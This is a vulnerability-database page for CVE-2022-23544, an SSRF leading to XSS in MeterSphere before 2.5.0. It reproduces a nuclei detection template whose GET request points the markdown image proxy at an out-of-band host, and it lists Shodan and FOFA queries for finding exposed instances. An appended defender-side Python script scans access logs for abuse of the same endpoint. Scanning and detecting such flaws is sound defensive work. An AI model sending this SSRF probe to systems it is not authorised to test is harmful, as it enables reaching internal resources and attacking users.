
MeterSphere < 2.5.0 SSRF

Published: 04 Jul 2026 03:00:48
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

MeterSphere SSRF vulnerability in versions before 2.5.0.

id: CVE-2022-23544

info:
  name: MeterSphere < 2.5.0 SSRF
  author: j4vaovo
  severity: medium
  description: |
    MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23544
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj
    - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23544
    cwe-id: CWE-918,CWE-79
    epss-score: 0.01607
    epss-percentile: 0.72941
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query:
      - html:"metersphere"
      - http.html:"metersphere"
    fofa-query:
      - title="MeterSphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve2022,cve,metersphere,ssrf,oast,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402201ac16ec8ea20631dc36a0bc0dd56e4fe881f8d0cd9d2d792a12c9c4f87beb3a802205474fed6a2ec5efa4ff3e371ff2d697da50f7133c025a3dd38d621b39929bb9f:922c64590222798bb761d5b6d8e72950
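Added here as a defender-side example, not part of the Vulners record or of the nuclei template above: a Python triage script that walks web-server access logs for requests to the `/resource/md/get/url` endpoint the template probes and flags `url` parameters that point at internal address space or at a host other than an allowlisted image source. The combined-log regex, the allowlist host `img.example.com` and the sample log lines are constructed assumptions; the page does not describe MeterSphere's own logging, so adapt the parser to whatever sits in front of the application.

```python
"""Access-log triage for CVE-2022-23544 (MeterSphere SSRF, fixed in 2.5.0).

Constructed example: flags requests to the markdown image proxy endpoint
whose `url` parameter points at internal address space or at a host that
is not an allowlisted image source. Log format, allowlist and sample lines
are assumptions for this example, not MeterSphere's own configuration.
"""
import ipaddress
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Endpoint probed by the nuclei template on this page.
VULN_PATH = "/resource/md/get/url"

# Hypothetical allowlist: the only host the proxy should legitimately fetch from.
ALLOWED_IMAGE_HOSTS = {"img.example.com"}

# Apache/nginx combined log format (assumed front-end logging).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges; not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jul/2026:03:00:48 +0000] "GET /resource/md/get/url?url=http%3A%2F%2Foast.pro HTTP/1.1" 200 2119 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"
198.51.100.9 - - [04/Jul/2026:03:01:02 +0000] "GET /resource/md/get/url?url=http%3A%2F%2F10.0.0.12%2F HTTP/1.1" 200 512 "-" "curl/8.4.0"
192.0.2.44 - - [04/Jul/2026:03:01:30 +0000] "GET /resource/md/get/url?url=https%3A%2F%2Fimg.example.com%2Flogo.png HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
192.0.2.45 - - [04/Jul/2026:03:02:10 +0000] "GET /api/project/list HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
"""


def classify_target(url: str) -> Optional[str]:
    """Return a reason string if `url` is a suspicious proxy target, else None."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https"):
        return "non-http scheme"
    if not host:
        return "unparseable url"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # hostname rather than an IP literal
    if addr is not None and (
        addr.is_private or addr.is_loopback or addr.is_link_local
        or addr.is_reserved or addr.is_multicast or addr.is_unspecified
    ):
        return "internal address"
    if host.lower() not in ALLOWED_IMAGE_HOSTS:
        return "non-allowlisted host"
    return None


def triage_access_log(log_text: str) -> list:
    """Scan combined-format log lines; return one finding per suspicious proxy request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        if target.path != VULN_PATH:
            continue
        urls = parse_qs(target.query).get("url")
        if not urls:
            continue  # endpoint hit without a url parameter; nothing was fetched
        reason = classify_target(urls[0])
        if reason is None:
            continue
        findings.append({
            "client": m["client"],
            "time": m["ts"],
            "target_url": urls[0],
            "reason": reason,
            "status": int(m["status"]),
            "user_agent": m["ua"],
        })
    return findings


if __name__ == "__main__":
    for f in triage_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} -> {f['target_url']} [{f['reason']}] HTTP {f['status']}")
```

On the constructed sample the script reports the two requests whose targets are an outside host and a private address, and ignores the allowlisted image fetch and the unrelated API call. A literal-IP check alone is not sufficient against a hostname that resolves to an internal address, which is why the allowlist is the primary control here; the status code is recorded because a 200 with a `text/html` body is what the template's matchers treat as a successful fetch.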


Vulners AI Score: 6.3 (Medium risk), current as of 04 Feb 2026 07:00
CVSS 3.1: 6.1 - 7.2
EPSS: 0.01607